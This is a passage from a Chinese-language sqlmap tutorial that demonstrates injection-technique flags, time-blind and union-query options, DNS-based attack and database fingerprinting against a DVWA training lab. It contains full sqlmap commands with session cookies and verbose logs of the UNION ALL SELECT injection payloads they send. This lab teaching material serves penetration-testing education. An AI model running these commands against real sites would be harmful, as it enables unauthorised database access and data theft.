指定注入技术
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique="BEUSTQ"
B:基于Boolean类型盲注
E:基于报错的注入
U:联合查询注入
S:堆叠注入
T:基于时间的盲注
Q:内联查询注入
默认使用所有注入技术,--technique="BEUSTQ"
设置时间盲注的参数
--time-sec:设置基于时间盲注的延时,单位是秒,默认5秒
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique=T --time-sec=1
联合注入的参数
--union-cols:设置联合注入的列数,默认1-10列。虽然通过提高--level可以增加列数,但是可以通过--union-cols可以设置固定的列数。例如:设置union测试的列为12-18
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-cols="12-18"
--union-char:设置union注入的字符,默认是NULL。设置更高级别的level时,会使用随机数进行测试,因为某些情况下,union查询测试NULL会失效,而随机数会成功。例如:设置union字符为"123"
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-char="123" -v 3
使用123作为union字符,默认查询1-10列
[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
[22:19:33] [PAYLOAD] -1370) UNION ALL SELECT 123,123,123,123,123-- iprn
[22:19:33] [PAYLOAD] -5507) UNION ALL SELECT 123,123,123,123,123,123-- Inhq
[22:19:33] [PAYLOAD] -9862) UNION ALL SELECT 123,123,123,123,123,123,123-- IwGO
[22:19:33] [PAYLOAD] -5351) UNION ALL SELECT 123,123,123,123,123,123,123,123-- EdWF
[22:19:33] [PAYLOAD] -3384) UNION ALL SELECT 123,123,123,123,123,123,123,123,123-- ThkG
[22:19:33] [PAYLOAD] -6285) UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123-- vyBV
--union-from:设置union注入要查询的表,如设置users表作为union注入要查询的表
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-from="users" -v 3
默认查询字符使用NULL,查询范围1-10,指定的表为users
[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL FROM users-- MuVY
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM users-- Wijp
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM users-- wYUU
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- rWYB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LvGo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LnTt
[22:27:17] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- YGVF
针对DNS攻击
--dns-domain:通过指定目标DNS服务器攻击,需要目标开放了53端口的dns服务。
sqlmap -u "目标URL" --dns-domain="目标URL"
获取数据库指纹信息
-f或者--fingerprint
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=8jh3juigrkaqipeu1oiinhcpbi; security=low" -f
由此可见,数据库是Mysql,版本号是5.7
[20:15:10] [INFO] testing MySQL
[20:15:10] [INFO] confirming MySQL
[20:15:11] [INFO] the back-end DBMS is MySQL
[20:15:11] [INFO] actively fingerprinting MySQL
[20:15:11] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
html error message fingerprint: MySQL